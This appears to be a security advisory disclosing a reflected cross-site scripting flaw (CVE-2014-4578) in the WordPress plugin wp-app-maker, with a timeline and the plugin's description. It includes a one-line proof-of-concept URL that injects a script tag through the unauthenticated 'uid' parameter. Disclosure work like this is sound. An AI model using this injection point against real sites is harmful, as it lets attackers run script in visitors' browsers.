wp-plugin : wp-app-maker – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-app-maker

 

Effected Version : 1.0.16.4 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

http://localhost/wp-content/plugins/wp-app-maker/asset-studio/icons-launcher.php?uid=&<script>alert(‘xss’);</script>

Vulnerable Parameter : uid

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Closed
 
Public Disclosure : June 4, 2014
 
CVE Number : CVE-2014-4578

 
Plugin Description :
 
WP App Maker let you easily generate and start distributing an Android Mobile App for Wordpress just a few minutes after installing it.
It requires a user registration just in order to enable the cloud app generation service.

Here are some of its powerful features:

* Toolbar and text colors customization
* Launcher Icon generator
* Mobile Categories customization and filtering
* Widget for publishing your QRCode on the sidebar
* Usage tracking powered by Google Analytics (*)
* Monetization based on AdWhirl services (*)
* Images size optimization
* Fast caching engine for offline usage

(*) features available only for the PRO version.

More details are available on the official website:
[wpappmaker.com](http://wpappmaker.com "WP App Maker")

**The 5 minutes setup**
[youtube http://www.youtube.com/watch?v=V2U9WTLMUhc]

**Sample App**
[youtube http://www.youtube.com/watch?v=CjXGvD6XuCs]

Leave a Reply

Your email address will not be published. Required fields are marked *